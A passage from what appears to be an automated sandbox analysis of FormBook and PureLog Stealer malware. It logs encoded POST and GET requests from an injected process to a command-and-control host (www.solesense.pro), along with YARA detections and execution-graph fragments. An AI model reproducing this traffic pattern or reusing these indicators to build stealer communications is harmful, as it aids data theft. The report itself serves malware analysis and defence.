                                                                                                                                                                                                        Data Ascii: 0 .906.036 1.34.108V5.722c-.434-.073-.87-.11-1.34-.11-2.72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><sectio


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        33192.168.2.44977791.195.240.19804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:44.751929998 CEST736OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Origin: http://www.solesense.pro
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 68 4d 36 50 69 42 77 36 4c 49 71 57 48 6e 55 36 70 51 75 61 68 4a 4b 33 42 49 46 6a 77 77 41 56 72 72 72 52 49 2b 6b 71 66 6e 75 63 36 51 76 51 4b 58 4e 43 67 54 4b 70 70 69 53 47 75 45 39 4e 6c 36 61 72 46 55 47 55 53 45 51 52 52 65 4e 4f 54 54 63 77 62 39 37 4f 78 6a 6b 77 62 39 7a 41 74 58 6f 50 71 59 63 66 51 70 79 67 4d 58 62 31 70 77 69 54 57 50 55 57 71 67 46 61 75 4f 33 52 78 6a 31 34 6a 4a 38 62 2b 32 39 38 54 61 31 59 36 58 75 64 6d 77 55 61 44 4d 76 71 6d 56 78 4b 68 50 64 56 38 54 78 74 77 36 62 54 55 75 6c 68 39 2b 53 6f 35 41 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=IuMe+iFtDZEnhM6PiBw6LIqWHnU6pQuahJK3BIFjwwAVrrrRI+kqfnuc6QvQKXNCgTKppiSGuE9Nl6arFUGUSEQRReNOTTcwb97Oxjkwb9zAtXoPqYcfQpygMXb1pwiTWPUWqgFauO3Rxj14jJ8b+298Ta1Y6XudmwUaDMvqmVxKhPdV8Txtw6bTUulh9+So5A==
                                                                                                                                                                                                        May 8, 2024 18:23:45.063353062 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        34192.168.2.44977891.195.240.19804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:47.599287033 CEST756OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Origin: http://www.solesense.pro
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 6b 56 71 4c 37 52 4a 36 51 71 4b 6e 75 63 79 77 75 62 55 6e 4e 4a 67 54 47 62 70 6a 2b 47 75 48 42 4e 6c 36 4b 72 47 6a 71 58 53 55 51 54 61 2b 4e 4d 65 7a 63 77 62 39 37 4f 78 6e 49 61 62 39 62 41 74 47 34 50 6f 39 6f 59 64 4a 79 68 4c 58 62 31 34 41 69 58 57 50 55 6b 71 69 67 50 75 4e 50 52 78 6d 52 34 74 39 6f 55 6c 47 39 36 64 36 30 58 30 45 54 2f 6a 43 4a 4f 45 66 7a 56 75 56 70 30 6b 4a 4d 50 74 69 51 36 69 36 2f 67 4a 70 73 56 77 39 76 68 69 46 63 6f 68 35 62 32 6e 69 37 74 42 30 67 31 77 31 4c 78 6f 74 63 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDkVqL7RJ6QqKnucywubUnNJgTGbpj+GuHBNl6KrGjqXSUQTa+NMezcwb97OxnIab9bAtG4Po9oYdJyhLXb14AiXWPUkqigPuNPRxmR4t9oUlG96d60X0ET/jCJOEfzVuVp0kJMPtiQ6i6/gJpsVw9vhiFcoh5b2ni7tB0g1w1Lxotc=
                                                                                                                                                                                                        May 8, 2024 18:23:47.912966013 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        35192.168.2.44977991.195.240.19804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:50.446114063 CEST10838OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Origin: http://www.solesense.pro
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 73 56 72 34 44 52 49 64 4d 71 4d 58 75 63 75 67 75 59 55 6e 4e 75 67 54 65 66 70 6a 43 73 75 42 4e 4e 33 4d 47 72 52 69 71 58 59 55 51 54 48 75 4e 50 54 54 64 6f 62 39 4c 4b 78 6a 6f 61 62 39 62 41 74 46 77 50 68 49 63 59 4f 5a 79 67 4d 58 62 48 70 77 6a 43 57 4c 34 30 71 69 6c 30 75 38 76 52 79 47 42 34 67 6f 38 55 70 47 39 34 4e 71 31 49 30 45 66 4a 6a 43 46 43 45 63 76 2f 75 58 31 30 6b 4e 67 54 32 6d 56 74 33 73 54 44 53 75 42 7a 33 73 62 4d 74 33 67 57 73 4d 50 55 6c 69 6e 4e 43 7a 46 2b 74 55 53 79 31 34 43 50 46 34 42 4a 7a 74 70 37 59 46 4d 4f 31 79 6e 38 4e 63 59 48 35 57 43 66 39 52 6c 37 2b 5a 66 64 48 69 77 6a 2b 51 6b 43 39 57 4c 6e 62 71 47 36 70 32 79 41 53 54 61 6c 7a 4a 42 6d 4a 6d 44 4b 79 39 6b 62 7a 77 52 56 5a 47 64 42 39 57 61 38 51 43 35 41 4a 57 78 59 52 67 34 62 44 49 46 4e 75 77 4c 48 37 42 6d 43 77 41 53 30 7a 61 4e 6c 55 44 2f [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDsVr4DRIdMqMXucuguYUnNugTefpjCsuBNN3MGrRiqXYUQTHuNPTTdob9LKxjoab9bAtFwPhIcYOZygMXbHpwjCWL40qil0u8vRyGB4go8UpG94Nq1I0EfJjCFCEcv/uX10kNgT2mVt3sTDSuBz3sbMt3gWsMPUlinNCzF+tUSy14CPF4BJztp7YFMO1yn8NcYH5WCf9Rl7+ZfdHiwj+QkC9WLnbqG6p2yASTalzJBmJmDKy9kbzwRVZGdB9Wa8QC5AJWxYRg4bDIFNuwLH7BmCwAS0zaNlUD/jrjpeyHGq4BPjgqMWHsKGyM9no4iI9CaKauLUfrKV8ypzu+u6iQj3vYMGL1wvCa91ZUJ5eKFySBsq4zi26xkgCtGtYCfO/ploZjKuFx5AsL7Y5KIV/258GG0+9dJ8Ueftw6HEEb4ZxGKH9/wtkWSvQDjClus/l9TIWoq6MPmyM2ntaD+7Xpxptmemnxr2XP5HH17wm3znullWrRvDmbPVdsOPhI4XxsEszqWcfVbPjPZycH++622Sz0AqMaktyI/NCSr/+GNTEOmVBoz/t+tJMlCPhjoselAE3IwLHpSPAg17lrk/N61+0P8XriPAs3egsdWCFFP1BN8Ea0R3CcZNqbChKKacJl8Xo6l4YGLFW0zZmC58UNMQfLyuK6KBty+495RQVdjcNy0WSfeQYodRRMjPqDnH2X+CwjdWPIXgOHA8Am5PNSRhfonm+UAyRHjLPlMzhXplWLn1SeYlo9rr9h8WCRtngyWQRwy+kBUu81LLT3EIs4oMBSPOH51qkARDvtJSlUznCJZ8jCtEfdUCN2xNjfB/18o3VhGLNu/W1iBswU5/40cn4vgtMIbRNXR6z6pbKKBNtITG58DKQSeDGW9wmQJo40NyU7g3jjWZiJ507ewS2vUon8WqYLiihIfSzcQ5gvWWBQosM+awc5VHdMBN/t4wIDnAb [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:23:50.757091999 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        36192.168.2.44978091.195.240.19804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:53.287883043 CEST478OUTGET /aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.solesense.pro
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:23:53.599443913 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:18:19:53
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0x980000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:18:19:55
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0xa0000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:18:19:55
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0x9a0000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:18:20:16
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe"
                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:18:20:18
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                                        MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:18:20:34
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe"
                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:18:20:46
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                        Imagebase:0x7ff6bf500000
                                                                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:8.6%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                                                          Total number of Nodes:126
                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                          execution_graph 38966 2b0c600 38967 2b0c646 38966->38967 38968 2b0c733 38967->38968 38971 2b0cbe8 38967->38971 38974 2b0cbd9 38967->38974 38977 2b0c83c 38971->38977 38975 2b0cc16 38974->38975 38976 2b0c83c DuplicateHandle 38974->38976 38975->38968 38976->38975 38978 2b0cc50 DuplicateHandle 38977->38978 38979 2b0cc16 38978->38979 38979->38968 38980 2b0a270 38983 2b0a368 38980->38983 38981 2b0a27f 38984 2b0a379 38983->38984 38985 2b0a39c 38983->38985 38984->38985 38989 2b0a600 LoadLibraryExW 38984->38989 38990 2b0a5f0 LoadLibraryExW 38984->38990 38985->38981 38986 2b0a394 38986->38985 38987 2b0a5a0 GetModuleHandleW 38986->38987 38988 2b0a5cd 38987->38988 38988->38981 38989->38986 38990->38986 38834 5292428 38836 529243c 38834->38836 38835 52924c8 38839 52924d8 38836->38839 38843 52924e0 38836->38843 38840 52924e0 38839->38840 38842 52924f1 38840->38842 38846 52936a0 38840->38846 38842->38835 38844 52924f1 38843->38844 38845 52936a0 2 API calls 38843->38845 38844->38835 38845->38844 38850 52936c0 38846->38850 38854 52936d0 38846->38854 38847 52936ba 38847->38842 38851 52936d0 38850->38851 38852 529376a CallWindowProcW 38851->38852 38853 5293719 38851->38853 38852->38853 38853->38847 38855 5293712 38854->38855 38857 5293719 38854->38857 38856 529376a CallWindowProcW 38855->38856 38855->38857 38856->38857 38857->38847 38858 2b04528 38859 2b04536 38858->38859 38862 2b04100 38859->38862 38861 2b0453f 38863 2b0410b 38862->38863 38866 2b03cb8 38863->38866 38865 2b0456d 38865->38861 38867 2b03cc3 38866->38867 38870 2b03cd8 38867->38870 38869 2b0460d 38869->38865 38871 2b03ce3 38870->38871 38874 2b043f0 38871->38874 38873 2b046e2 38873->38869 38875 2b043fb 38874->38875 38878 2b04420 38875->38878 38877 2b047f4 38877->38873 38879 2b0442b 38878->38879 38881 2b07803 38879->38881 38886 5299480 38879->38886 38891 5299490 38879->38891 38880 2b07841 38880->38877 38881->38880 38896 2b0c338 38881->38896 38901 2b0c32b 38881->38901 38887 52994b8 38886->38887 38888 52994fb 38887->38888 38906 2b0a600 38887->38906 38910 2b0a5f0 38887->38910 38888->38881 38892 52994b8 38891->38892 38893 52994fb 38892->38893 38894 2b0a600 LoadLibraryExW 38892->38894 38895 2b0a5f0 LoadLibraryExW 38892->38895 38893->38881 38894->38893 38895->38893 38898 2b0c359 38896->38898 38897 2b0c37d 38897->38880 38898->38897 38918 2b0c4d7 38898->38918 38922 2b0c4e8 38898->38922 38903 2b0c338 38901->38903 38902 2b0c37d 38902->38880 38903->38902 38904 2b0c4d7 LoadLibraryExW 38903->38904 38905 2b0c4e8 LoadLibraryExW 38903->38905 38904->38902 38905->38902 38907 2b0a614 38906->38907 38908 2b0a639 38907->38908 38914 2b096e8 38907->38914 38908->38888 38911 2b0a600 38910->38911 38912 2b096e8 LoadLibraryExW 38911->38912 38913 2b0a639 38911->38913 38912->38913 38913->38888 38915 2b0a7e0 LoadLibraryExW 38914->38915 38917 2b0a859 38915->38917 38917->38908 38920 2b0c4f5 38918->38920 38919 2b0c52f 38919->38897 38920->38919 38926 2b0b0a0 38920->38926 38923 2b0c4f5 38922->38923 38924 2b0c52f 38923->38924 38925 2b0b0a0 LoadLibraryExW 38923->38925 38924->38897 38925->38924 38927 2b0b0ab 38926->38927 38929 2b0d248 38927->38929 38930 2b0c89c 38927->38930 38929->38929 38931 2b0c8a7 38930->38931 38932 2b04420 